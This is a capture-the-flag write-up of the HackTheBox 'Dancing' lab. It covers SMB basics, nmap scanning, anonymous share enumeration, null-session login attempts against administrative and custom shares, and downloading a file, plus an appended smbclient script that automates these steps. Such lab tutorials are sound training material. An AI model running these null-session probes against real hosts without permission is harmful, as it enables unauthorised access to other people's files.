HTB-Dancing-Write-up

Mohamed Ali
4 min read, Nov 18, 2024


Introduction
There are several ways to transfer files between two hosts on the same network. This write-up looks at one of them, SMB (Server Message Block), a protocol that provides shared access to files, printers, and serial ports between endpoints on a network. SMB services are most often seen on Windows machines.
During scanning, we will typically find TCP port 445 open on the target; this is the port on which modern SMB runs directly over TCP. SMB sits at the Application/Presentation layers of the OSI model, so it relies on a lower-layer transport. The older transport is NetBIOS over TCP/IP (NBT) on TCP port 139, and many Windows hosts still expose it alongside 445, which is why scans frequently show both ports open. We will see this during the enumeration phase of the write-up.

Let’s Start Pwning Our Target

Initial Enumeration

First, we use ping to check that the target is reachable.

With the host answering, we run an Nmap scan against it.

The scan shows an SMB service open on TCP port 445.

When we ask the SMB client to list the target's shares, it defaults to our local username, since we do not know any remote usernames on the target that we could log in with, and then prompts for a password. The password it asks for belongs to that username. Hypothetically, if we were a legitimate remote user, we would know our username and password and log in normally to access our share. In this case, we have no such credentials, so we try one of the following instead:
Guest authentication
Anonymous authentication
Either of these lets us log in without a valid username/password combination and list the shares the server exposes. Let us proceed to try that. We leave the password field blank and simply press Enter to tell the client to continue.

As always, running the client with the -h or --help switch shows its capabilities and usage.
Running the share-listing command, we see four separate shares. Let us go through each of them and see what they mean.
ADMIN$ — Administrative shares are hidden network shares created by the Windows NT family of operating systems to give administrators remote access to the system; ADMIN$ maps to the system root directory (typically C:\Windows). These shares are recreated at startup and cannot be permanently deleted, but they can be disabled.
C$ — Administrative share for the C:\ disk volume, where the operating system is installed.
IPC$ — The inter-process communication share, used for inter-process communication over named pipes; it is not part of the file system.
WorkShares — A custom, non-default share.

We will try to connect to each of the shares except IPC$, which is not browsable like a regular directory and holds no files we could use at this stage (it is still worth remembering: a null session to IPC$ is what tools such as rpcclient use to enumerate users and shares over named pipes). We use the same tactic as before, attempting to log in without proper credentials to find misconfigured permissions on any of these shares, giving a blank password for the username each time. First, let us try ADMIN$.

The client prints NT_STATUS_ACCESS_DENIED, telling us that we lack the credentials to connect to this share. We follow up with the C$ administrative share.

Same result here. Last chance: we attempt to log in to the custom WorkShares share. It is human-made rather than a system default, and therefore more prone to misconfiguration.

This time the connection succeeds. Typing ls shows two directories, Amy.J and James.P. We enter the first one and find a file called worknotes.txt, which we download with the get command.
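The whole sequence above (ping, port scan, share listing, null-session attempts against each disk share, file download), as an added shell example that is not part of the original write-up. It assumes the client shown in the screenshots is smbclient (the standard Samba client); the target address is a placeholder, and the share listing embedded in the script is constructed to match the four shares named above so that the parsing step can be exercised offline.

```shell
#!/bin/sh
# Added example, not the write-up's own commands. 10.10.10.10 is a placeholder.

# Constructed sample of `smbclient -L //TARGET -N` output (not captured from the
# target), so the share-parsing step can be tested without a network.
SAMPLE_SHARE_LIST='
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
'

# Step 1: confirm the host answers, then scan the SMB ports
# (139 = NetBIOS session service, 445 = SMB directly over TCP).
scan_target() {
  if ping -c 1 "$1" >/dev/null 2>&1; then
    echo "$1 is up"
  else
    echo "$1 did not answer ping (may still be filtered, not down)"
  fi
  nmap -p 139,445 -sV "$1"
}

# Step 2: list shares with a null session (-N sends an empty password
# instead of prompting for one).
list_shares() {
  smbclient -L "//$1" -N
}

# Keep only the Disk shares from the listing and drop IPC$, which is not
# browsable. Reads the listing on stdin, prints one share name per line.
disk_shares() {
  awk '$2 == "Disk" && $1 != "IPC$" { print $1 }'
}

# Step 3: try a null session against each disk share (names on stdin) and
# report which ones allow a directory listing; ADMIN$ and C$ normally refuse
# with NT_STATUS_ACCESS_DENIED, a custom share may not.
try_null_sessions() {
  while read -r share; do
    if smbclient "//$1/$share" -N -c 'ls' >/dev/null 2>&1; then
      echo "$share: null session accepted"
    else
      echo "$share: access denied (or other failure)"
    fi
  done
}

# Step 4: download one file from a share non-interactively.
# $1 target, $2 share, $3 directory inside the share, $4 file name
fetch_file() {
  smbclient "//$1/$2" -N -c "cd \"$3\"; get \"$4\""
}

# Usage against a live target (placeholder address):
#   scan_target 10.10.10.10
#   list_shares 10.10.10.10 | disk_shares | try_null_sessions 10.10.10.10
#   fetch_file 10.10.10.10 WorkShares Amy.J worknotes.txt
```

The parsing step matters when there are more than a handful of shares: piping the listing through disk_shares and then try_null_sessions checks every disk share in one pass, instead of retyping the connect command per share as done in the screenshots.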

Let’s open the flag file.

Finally, here are the answers to the tasks.
